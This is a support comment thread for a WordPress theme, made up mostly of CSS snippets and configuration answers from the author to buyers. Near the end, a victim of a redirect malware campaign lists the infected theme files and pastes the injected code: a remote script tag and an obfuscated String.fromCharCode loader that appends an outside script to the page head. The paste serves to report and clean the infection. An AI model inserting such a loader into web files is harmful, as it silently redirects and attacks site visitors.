38438 comments found.
Hi there, On my site I have a transparent navigation. I am also using full-page slides. I’m having an issue where on lower screen resolutions, particularly computers with a low height, the logo is overlapping on top of content at the top of the page. I have sent you an email from my private email address. You should be able to confirm here that I have bought the theme.
Thanks so much, Sam
Hey Sam,
Please check your email in regards – I responded to this question you sent over there 
Hello since the update I am getting this error on my product list page. Warning: printf(): Too few arguments in [I’ve removed this as its my ftp]wp-content/themes/salient/woocommerce/single-product/product-image.php on line 102
Hey LastSketch, could you kindly reach out via the support forum or via the contact form on my author page https://themeforest.net/user/themenectar so I can take a closer look at the setup? So far I haven’t been able to replicate that locally
Thanks in advance
I noticed the error is because of the Jetpack plugin which is odd as thats a popular and recommended WordPress plugin. I deactivated the plugin and will retry either when they perform an update or if you could put that apart of your next update.
Hey LastSketch, thanks for letting me know – I’ve noted to test in regards
Hi. How do I go about updating my theme? I’m on v 8.5.3 and don’t see the update option anywhere.
Hey rouge1, you can use any of the available methods described here: http://themenectar.com/docs/salient/updating-salient/
YES!! I saw on the latest $alient 9 update “one of our most requested features, autoplay videos now available on mobile devices”!!
Indeed! We also added parallax scrolling support on mobile as well which I believe you were looking for in the past 
Cheers
I Noticed that Too when I went back after my comment here!! For years I was hopin’ and prayin’ To the Salient Mobile Parallax Gods IT’S COME TRUE!!! I will send your demo links (do you have a new one showcasing mobile parallax and auto play mobile view videos?) to clients as one of my fav themes asap These days I often send new clients suggested theme links so they buy their own copies so they always have access to the updates themselves after I built and it goes live, just FYI it’s not me buying multiple copies these days, but still I might def do that myself as well Woooo Hooooooo! #ONEOFTHEMESEVERSTILLEVENGETTINGBETTER!!
http://themenectar.com/demo/salient-ecommerce-ultimate/product/athletic-shirt/
Tabbed VC widget is BROKEN in latest version of Salient…
http://banguptotheelephant.restaurant/restaurant-home-page/Hey sdksdksdk, could you kindly reach out in regards via the contact form on my author page with your admin credentials so I can take a look at the setup https://themeforest.net/user/themenectar ? I cant’ seem to replicate it on my end and all of the demos have been updated without showing that issue http://themenectar.com/demo/salient-restaurant/
Thanks in advance
thx, i left a support ticket regarding this issue…
Thanks, did you post at the forum here – https://themenectar.ticksy.com/ ? I’m not seeing any tickets from this username at the moment
Cheers
Hi Presale question? Can I have albums of images as a gallery like this? https://the7.io/main/shortcodes/3-shortcodes/photo-albums/ with your theme?
Hey Mbx,
the styles within the Image Gallery element that Salient offers can be seen here: http://themenectar.com/demo/salient-promo/image-grid/
Cheers
I don’t think that answers my question. It’s not only a style that’s going on. I was specifically referring to the feature that allows users to click see an album and the number of images inside that album, and then clicking on it will take them to the gallery of that album that they clicked on.
Hey Mbx, there is no option to have each image trigger a separate gallery of images at this time
Bääähm! What a outstanding update! Congratulation!. Great that you once dedicated to Woo Commerce
Glad you dig it Shenjai 
Cheers
hi, we have an external script to show a search box to search bookings, but sometimes it shows this code “minimal-form-input no-text” inside a label why is this? you know how to get this off? thanks
Hey dimage,
Could you kindly share the page URL in regards so I can take a look?
Cheers
Hello
I wonder why the first left fancy box at the bottom doesn’t align like other fancy boxes? Here is my website, http://ketchupstudiobkk.com . Please have a look.
Hey twinsterphoto, updating the theme should fix that or you could add this into the custom css box located in the Salient options panel > general settings > css/script related tab
body .nectar-fancy-box[data-style="parallax_hover"] .inner {
padding: 30% 0px;
}
Cheers
It worked perfectly. Thanks 
Glad to hear twinsterphoto 
Hi guys! I’m trying to alternate some images using the cascading images feature and I hit a small problem, when the 2nd image loads the 1st one is still left behind and it interferes with the 2nd one (shadows and objects that are no longer in the 2nd image still appear because the 1st image is still displayed underneath). How can I teach cascading images to turn off the image which is not active on screen? or in other words hide the images that sit underneath? Thanks for your help
Hey alienintelligence,
Could you kindly share the page URL in regards so I can take a look to better assist?
Thanks
Hi, I managed to get around it by playing with transparencies and pngs. thanks anyway
No problem alienintelligence, glad you sorted it
Actually, please help
I still have the issue if I decide to change the background. Please see the issue here in the middle sections https://ovidrive.com/home-new-2/
The alternative images actually overlap and you can see the shadows getting darker and darker. Thank you
Hey alienintelligence,
Give the parent row a custom class name of “ovidrive-ecosystem” to target it separately and then add this into the custom css box located in the Salient options panel > general settings > css/script related tab
.ovidrive-ecosystem .nectar_cascading_images.animated-in >div:nth-child(1) {
transition: opacity 0.3s ease 4s;
opacity: 0;
}
.ovidrive-ecosystem .nectar_cascading_images.animated-in >div:nth-child(2) {
transition: opacity 0.3s ease 8s;
opacity: 0;
}
.ovidrive-ecosystem .nectar_cascading_images.animated-in >div:nth-child(3) {
transition: opacity 0.3s ease 12s;
opacity: 0;
}
Cheers
Still no 9.0 ?
Hey nvado, it was just released – you can check out the full changelog here: http://themenectar.com/changelogs/salient.html
Cheers
Hello Team,
Thanks for creating such a great theme, Can you please guide me how to keep default toggle open all the time.
One of my client is using Salient theme and they would like to keep all the toggle open so can you please suggest me how to do that?
I can do that using CSS but it’s not that much effective can you please suggest me some script or changes?
Hey princebhalani143,
The only way to start a toggle open is to check the option for “Allow collapsible all” in the toggle panel element settings
Thanks for your reply “Allow collapsible all” used for toggles in an accordion. I have achieved desire result using CSS.
/* Toggle Change */
body .toggle>div {
display: block!important;
}
.toggle h3 a i {
display: none !important;
}
.toggle h3 a, .toggle h3 a:hover {
cursor: unset;
}
Glad to hear
princebhalani143 
Hello, Can you please suggest me how to change footer font & size between footer menu lines? I also submitted ticket. Please check.
Thanks!
Hey Marshalcom,
I will take a look for the ticket on the forum 
Cheers
Hi! I’m looking forward to the official v9 release. I understand that it’s very soon – is there a specific time today or tomorrow that we might be able to update our current versions? I also requested a beta, but if the official release is within 24 hours I can definitely wait.
Also, if I already created a website using Salient’s child theme for v8.5, when I update to v9, will I lose anything or need to specifically adjust/change anything to ensure my website still works like normal but now with added features from v9? In other words, will any of the formatting of my current pages on v8.5 be affected once I update to v9 if I am using a child theme? I would hate to break my website my accident! Or let me know if I should be backing up everything.
Thank you!
Hey dangsial,
It was just released 
As long as your modifications are contained to the child theme it should go pretty easily – however if you’ve copied core files into the child theme such as the header.php, footer.php etc, then those would need to be updated in the child theme after updating to reflect the new structure of the parent files
Cheers
Amazing update, thanks for all your hard work!! Just a few small things I noticed after updating:
- The font on my call to action/buttons changed, where can I adjust this?
- My footer copyright font may have also changed, or my eyes may be playing tricks on me. Can I adjust this somehere?
- The contact form does not have the material ui/interactive interface like it did before. For example, prior to the update, the boxes to enter information in wasn’t large and gray – it remained white and expanded upon typing. Also for example, when clicking the “Name” field, the title of the field animated/automatically moved upwards like a google material UI form and revealed the space to type after. Not sure if this makes sense, but my contact form now looks very old-school ish whereas before it had a google material ui-like design and feel. Where can I adjust this option back to its original?
Thanks dangsial 
1/2. Could you kindly share your URL in regards so I can take a look?
3. Unfortunately that style had to be switched to not rely on javascript to move the labels around – it ended up being a main source of user issues when using third party forms in one way or another. If you are using the material skin, change your form styling to “Inherit” in the Salient options panel > form styling tab. It’s still not as interactive as the last, but you may like it better
Cheers
There is a call to action button that says “begin lift-off” on the page – this was the font and styling that was originally on the other call to actions/buttons throughout the page I think. Essentially after the update, the font styling for buttons/cta’s became heavier in weight and I’m not sure how to fix it.
Additionally, the copyright area font may have gotten larger than it was before. If this was changed after the update, could you please provide the css for me to specifically style this?
3) No problem, I took your advice and used the material ui plugin and it now works according to how I envisioned it 
4) Could you also provide me the css code to adjust the top and bottom padding for the header navigation bar? Just wanted to see what it would look like if I made it narrower.
Thanks a ton again for all your help in advance!
5) Sorry to add one more thing to your plate, I know you deal with a lot of questions (thank you for being so awesome). Our “Bio Shown In Fullscreen Modal” element on our “About” page has a darker gray bar popping out from the center of the page to the right side. It was working fine before like the Salient promo page showing this feature, but now there’s a darker gray bar coming from as well. Could you please advise how to resolve this or if I have to recreate the page or delete/re-add the feature?
Thanks!!
Hey dangsial 
It appears for the Begin Lift Off CTA, you’re inheriting from the heading 6 typography settings which is using
“Roboto” with a weight of 500 – What do you currently have set for the “Sidebar, Carousel, Nectar Button & Footer Headers Font” in the Typography > Nectar Specific elements tab?
In regards to the copyright area:
Add this into the custom css box located in the Salient options panel > general settings > css/script related tab
#footer-outer #copyright {
padding: 10px 0px;
}
4. You can set the header padding via the Salient options panel > header navigation > logo & general styling tab with the field “Header Padding”. The default value is 28, so enter anything lower than that to see the size difference on the front
5. That page is currently password protected – could you allow me to bypass it so I can take a look?
Cheers
Hi again,
Thanks for all the awesome and super responsive help so far!
Button Text Issue: Changing the typography for “Sidebar, Carousel, Nectar Button & Footer Headers Font” in the Typography > Nectar Specific elements tab has fixed this. All resolved!
Copyright footer text issue: for your css code that you provided, it seems like that reduces the padding (which is also great and nice to have) – could you please let me know how I could adjust the copyright text itself? In terms of font style/type/weight. Currently, it uses the body font styling, but it would be nice to style it separately.
Header padding: Great! This worked. I had “0” in there before and noticed no difference, but I see now that you just have to have a value between 0 and 28 to see a difference).
5) I have now removed the password to our About page so you can review the full screen bio issue.
A few other minor things came up today as we were doing a review:
6) On Home8g page we linked previously, in reference to the images shown next to the “A versatile partner for your journey” and “Valuable perks for flying with us”, there is a light gray border shown on the bottom and right side of the picture for the first one, and a light gray border shown on the bottom of the picture for the second one – this appears to only be visible on Macbooks (we tested on a 12 inch Macbook with retina). Looking at these images on a PC though, there are no borders visible between the white background of the pictures versus the white background of the rows.
7) For mobile viewing, on the Home8g page at the very bottom just above the “All systems go.” text, I am not sure why but an additional line appears across the page on top of my divider line. This only happens in mobile view. Can this be fixed?
When viewing the whole website on macbooks with retina display (we can only speak from a 12 inch Macbook perspective), the website looks very zoomed in, with text/images etc. appearing larger than I would like. It appears that the webpage does not scale downwards to match the screen of a Macbook. Ideally, I would want everything about 20-40% smaller than what they currently see (perhaps force a tablet resolution?). Do you have any suggestions on how we can address this so our website experience is the same across all platforms? PC resolutions of 1080p and above look great. It’s primarily smaller macbooks with retina displays that we’re seeing this “issue” as everything seems larger than we’d like it to be and the experience is not the same with the lack of padding/white space throughout.
If you have any questions, please let me know!
Hey dangsial,
4. Add this into the custom css box located in the Salient options panel > general settings > css/script related tab
5. As soon as I swap the SVG image you have for the team member full image with a regular jpg/png via the inspector that space goes away – is there any reason you’re using an SVG instead of an image for that section?
6. I tried to replicate this on my 13” macbook pro but so far I have not been able to see those lines – what browser are you using?
7. Try to add this into the custom css box:
.wpb_row .row-bg-wrap .row-bg-overlay {
background-repeat: no-repeat!important;
}
8. Is this related to you updating to 9.0 or are you just curious how you can shrink the content down further for small desktop screens?
Cheers
Hi!
Apologies for the late reply, had a personal circumstance to take care of.
4) I believe you accidentally forgot to include the CSS code to specifically style the copyright footer text.
5) No worries, we will use non-svg for now. We liked SVG as the quality remains flawless as the image moves.
6) Chrome was being used, I will see if this problem persists and will open a proper ticket if this persists.
7) That fixed it, thank you!!
It is unrelated to 9.0 salient. I guess I am just wondering how to shrink the content down further for small desktop screens, or I guess specifically smaller macbook screens (less than 15”). I believe the issue might be the fact that for a 12 inch macbook (as an example), its 2304×1440 resolution mimics that of a much larger laptop that is 1080p due to the retina display. As such, a small macbook will show the full resolution/size of the website, although its screen is actually much smaller due to its high pixel count. Not sure if this is achieveable, but would love for the text size shown on smaller macbooks to be scalled down.
9) Also for the pricing table template, for each bullet point or list item, if the text goes to the second line (and onwards if it’s longer), it does not get indented. Only the first line of the bullet point/list item gets indented for the pricing table. How can I fix this with CSS?
Thanks again!
Hey Dangsial,
4. Sorry about that!
body #footer-outer #copyright p {
font-weight: 600;
font-family: Roboto;
}
In regards to targeting retina screens only, you could wrap the needed CSS inside of a media query like this:
@media screen and (min-device-width: 1200px) and (max-device-width: 1600px) and (-webkit-min-device-pixel-ratio: 1.5) {
html body {
font-size: 12px;
line-height: 23px;
}
}
To address the list item indentation placement, could you share the page URL in regards?
Cheers
Thank you for the retina CSS code snippet! Where would the ”!important” part go and could you provide an example with h1 and p fonts adjusted?
- As for the list item indentation placement issue, here is the page URL – the issue is within the pricing table: https://pulsedigital.co/pricing-v2/Cheers
Sorry to add another request (you have the absolute best support by the way) -
I was able to remove the header on a single portfolio page using this CSS: .single-portfolio .row.project-title { display: none !important; }
However, I would also like to force the navigation bar to be transparent, but this option is missing for portfolio pages (unlike normal pages, where there is an option to force transparency. Is there a way to force this for single project/portfolio pages?
Example: https://pulsedigital.co/portfolio/bean-around-the-world/Hey dangsial,
1a.
@media screen and (min-device-width: 1200px) and (max-device-width: 1600px) and (-webkit-min-device-pixel-ratio: 1.5) {
html body h1 {
font-size: 20px;
line-height: 35px;
}
html body p {
font-size: 12px;
line-height: 23px;
}
}
1b. Add this into the custom css box located in the Salient options panel > general settings > css/script related tab
body .pricing-table[data-style="flat-alternative"] .pricing-column li { position: relative; padding-left: 25px; }
.pricing-table[data-style="flat-alternative"] .pricing-column li i {
position: absolute;
left: 0;
top: 10px;
}
2. As of now the only way to activate the transparency on a project single template is to use a page header BG color/BG image, if you set on of those and still hide the section with css, it should go transparent
Cheers
is it possible to replace how the search interface looks? Maybe in the next version to have a more normal option? I don’t like the whole popping up full-width overlay search that is the only option in the theme. Maybe i can replace somehow easilly? thanks
Hey crazyheart,
Each of the theme skins in the theme options panel > general settings tab (original, ascend and material) have different search displays – if none of those are what you’re looking for, some custom development would be required
how to make news become 2 columns? for now, i got 3 column for news.
here is my website http://macroad-dev.com/
Thanks.
Hey infodigi, I’m currently seeing 2 columns displaying under your “Recent News & Updates” section – have you changed this layout already or are you referring to another section?
Cheers
hai team salient, yes i already change it into 2 columns… but now, i want 2 columns also into mobile version.. for now when i load website on mobile it just show 1 column.. how to display 2 column in mobile view?? thanks..
and 1 more things.. how to make menu header transparent in mobile view?? but when it scroll it has background… thanks..
Hey
1. Add this into the custom css box located in the Salient options panel > general settings > css/script related tab
.mobile .blog-recent.columns-2 .col {
width: 50%!important;
padding: 10px;
}
2. The only way to have a transparent header nav on mobile is to use the “Header Permanent Transparent” in the Salient options panel > header navigation > transparency tab
Cheers
haiii team salient… I already tried number 1 solution… its working really well… thanks.. now how if i want to make 2 column into upper section like macroAd at glance… i mean the visual composer, for now in mobile it only shows 1 column too.. you can visit http://macroad-dev.com/
is there any solution to make it 2 column into mobile?? thanks..
hai team salient, i already find it, the setting is on responsive option on each columns right?? thanks team salient 
Hey infodigi, you can handle that directly in the page builder by editing each of the columns and using the responsive options tab. In there, you can select the column you desire for the mobile viewport
edit, I see you found the answer before I was able to respond 
hai team salient, how to set footer content?? when i already type my footer content… it has default text such as © 2018 macroads indonesia. (like © 2018 with website name)... how to remove this?? thanks
Hey infodigi, In the Salient options panel > footer tab you can remove that with the option “Disable Automatic Copyright”
Cheers
hai salient theme, thanks for the answer.. i wanna ask again, how to make footer area becoming one line in mobile version?? now i dont have one line.. take a look at http://macroad-dev.com/ Thanks.
one more things, how to import custom font and apply it into my website?? for example i have graphik.ttf.. thanks
Hey infodigi,
1. Add this into the custom css box located in the Salient options panel > general settings > css/script related tab
@media only screen and (max-width: 690px) {
#footer-outer .col, body #footer-outer #copyright .col ul {
width: 100%!important;
text-align: center;
}
body #footer-outer #social li {
float: none;
display: inline-block;
}
body #footer-outer #copyright li a i {
padding-left: 0;
}
}
2. As of now this would require the use of a plugin or by one of these methods https://themenectar.ticksy.com/article/9773/
thanks salient team…
btw how to make pin point in google maps not show in the center of screen… i want it to display in top right on the screen… how to make it??
Thanks..
Hey infodigi,
To adjust the alignment relative to the map you can change the map center lat/lng – that option at dictates the center focus of the map itself, and the lat/lng you supply for you marker determines where pin(s) actually get plotted
Cheers
hi salient team,
so i cant move the pin in the right top of screen?? because whenever i change the lat/lng it will automatically center the position… i dont want the position to be center.. is it possible? thanks…
Hey infodigi,
You can indeed move it away from the center – you need to slightly change the center point longitude to be different than the actual marker longitude – see the screenshot for an example: https://ibb.co/daNasz
Cheers
hai salient theme, i want to ask… why if i make 3 columns in mobile version there are some space that not tidy.. you can see here http://macroad-dev.com/company/ and make it as mobile view.. you can see under our client section…
the 3 column is not tidy, can you help me figure it out this problem? thanks.
Hey infodigi,
Add this into the custom css box located in the Salient options panel > general settings > css/script related tab
@media only screen and (max-width: 690px) {
body .vc_row-fluid .vc_col-xs-4 {
width: 33%;
margin: 0!important;
padding: 1%;
}
}
Cheers
thanks salient team, its work… i want to ask again… how to edit menu for mobile version?? is there any setting to edit the menu?? thanks.
Hey infodigi,
You can edit the colors in the Salient options panel > header navigation > logo & general styling at the bottom by selecting custom for the “Header Color Scheme” and you can edit the font settings in the Salient options panel > typography > Off Canvas Navigation field
Cheers
haii salient team,
i want to ask, is it possible to make slider in my homepage… but it just the picture that slide, the content is static… so just the background behind will slide.. here the link to my website http://macroad-dev.com/
thanks
i wanna ask one more thing, i did mobile screen code for iphone 4,5,6,7,8 plus..
but the media screen can’t run for iphone 4… for iphone 6 and 7 plus its oke..
here the code:
@media only screen and (max-width: 320px){ body .container { max-width: 293px!important; } }
@media only screen and (max-width: 380px){ body .container { max-width: 330px!important; } }
@media only screen and (max-width: 414px){ .container { max-width: 380px!important; } }
for max-width: 320px it can’t run the css… can you help me figure it out?? here the link to my web..http://macroad-dev.com/
Hey infodigi,
1. Unfortunatey there’s no slider option like that as of now, however i’ve noted your +1 for the idea on the wishlist
2. There doesn’t appear to be any syntax errors in the snippet that would prevent it from running on older iphones:
@media only screen and (max-width: 320px){ body .container { max-width: 293px!important; } }
I would need to see all of the custom css added to check for other errors that might prevent it from running. Please open a ticket in regards with your admin credentials https://themenectar.ticksy.com/
Cheers
My site is currently affected by the redirect malware univerf.com as described in this post – https://blog.sucuri.net/2018/08/massive-wordpress-redirect-campaign-targets-vulnerable-tagdiv-themes-and-ultimate-member-plugins.html
I would like to clean the theme to make sure there’s no code injection anywhere. What do you advice?
Hey 30thcd, you could download a fresh copy of the theme and then run a version compare using git or your desired version control software to see any changes that exist
I have a friend who uses salient as well and they have the same issue with the unverf.com malware redirect attack. Have you check your theme against this malware?
Hey 30thcd, we are currently unaware of any security holes that would allow that attack – could you share your actual URL in regards so I can take a look at the setup? Also, have you already compared your copy of the theme to a raw version to verify nothing has been added to it?
Yes, compared the following files were infected:
.\header.php .\template-no-header-footer.php .\template-no-header.php .\js\jquery.fancybox.min.js .\js\jquery.fullpage.min.js .\js\jquery.twentytwenty.js .\nectar\options\css\custom-theme\jquery-ui-1.10.0.custom.css .\nectar\options\fields\slider\vendor\nouislider\redux.jquery.nouislider.js .\nectar\options\fields\slider\vendor\nouislider\redux.jquery.nouislider.min.js .\nectar\redux-framework\extensions\vendor_support\vendor\select2\select2.jquery.json .\nectar\redux-framework\reduxcore\assets\css\vendor\jquery-ui-bootstrap\jquery-ui-1.10.0.custom.css .\nectar\redux-framework\reduxcore\assets\css\vendor\jquery-ui-bootstrap\jquery-ui-1.10.0.custom.scss .\nectar\redux-framework\reduxcore\assets\css\vendor\qtip\jquery.qtip.scss .\nectar\redux-framework\reduxcore\assets\js\vendor\jquery.alphanum.js .\nectar\redux-framework\reduxcore\assets\js\vendor\jquery.serializeform.js .\nectar\redux-framework\reduxcore\assets\js\vendor\jquery.typewatch.js .\nectar\redux-framework\reduxcore\assets\js\vendor\qtip\jquery.qtip.js .\nectar\redux-framework\reduxcore\assets\js\vendor\qtip\jquery.qtip.min.js .\nectar\redux-framework\reduxcore\inc\fields\slider\vendor\nouislider\redux.jquery.nouislider.js .\nectar\redux-framework\reduxcore\inc\fields\slider\vendor\nouislider\redux.jquery.nouislider.min.js .\nectar\redux-framework\reduxcore\inc\welcome\js\jquery.easing.min.js .\nectar\tinymce\shortcode_generator\js\chosen\chosen.jquery.min.js
Here are the injected codes
in php files:
<script type=’text/javascript’ src=’https://stat.uustoughtonma.org/stats.js?f=2'></script>
in js files
var n2 = document.createElement(‘script’); n2.type = ‘text/javascript’; n2.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 51); var scripts = document.getElementsByTagName(‘script’); var n4 = true; for (var i = scripts.length; i—;) {if (scripts[i].src n2.src) { n4 = false;}else{} } if(n4 true){document.head.appendChild(n2);}
We cleaned those files as well as the database but a day later, the codes were injected again, so there’s got to be a back door that is being used.
Hey, the exploit that is used by https://blog.sucuri.net/2018/08/massive-wordpress-redirect-campaign-targets-vulnerable-tagdiv-themes-and-ultimate-member-plugins.html targets every file on your setup that contains “head”, which would explain how it got into so many files. That means all plugins on your setup that contain that word were likely injected as well. Have you went through all of them and cleaned them out too? Also, did you also update ultimate member and then delete all PHP files in subdirectories under wp-content/uploads/ultimatemember/temp/ ?
Thanks! We are cleaning them now and as well as other wp core files.
Hi, do you have any ETA for the new version? please let me know if you got my request about downloading the beta version. thanks
Hey frankapp, it’ll be out tomorrow 
Hi, my dark and light logos aren’t working fine on my blog page, the dark logo just doesn’t appear on desktop version (mobile works fine). I had the same issue with my homepage but I solve it with #header-outerdata-transparent-header=”true”.transparent .midnightHeader.dark #logo img.dark-version opacity: 1!important;
Could you help me please?
p.s. the tag and category page works fine
Hey webDes13,
Can you please share the URL in regards so I can take a look?
Cheers
thanks so much for your fast support. Now everything is alright (I’ve upload an background image in the hero section).
My last question:
Could you tell me please how can I add a text descriptions to the Category and Tags Archives on the Blog?
You’re welcome webDes13 
As of now that would require a modification to the nectar_page_header function in the functions.php – it can also be copied into a child theme functions.php to make the change live through theme updates
Can you write it please?
Hey webDes13, unfortunately custom PHP snippets are above what we’ve allowed to provide with support – but the function you’re looking for is call “category_description” https://developer.wordpress.org/reference/functions/category_description/
ok! thanks for the informations
No problem webDes13 
Hello, Pre sale question, when i scroll mouse down, sliding image has an effect here, https://www.infosys.com/, do you have any option to make the slider changing effect like that, possibly in one page demo, like this one? http://themenectar.com/demo/salient-app/ or do you have any other demo which has effect like that?
TIA
Hey ashiq10,
We have an option that’s similar to that: themenectar.com/demo/salient-service
Cheers
Hello, actually i need the effect how the slider changes. Thanks anyway.
You’re welcome ashiq10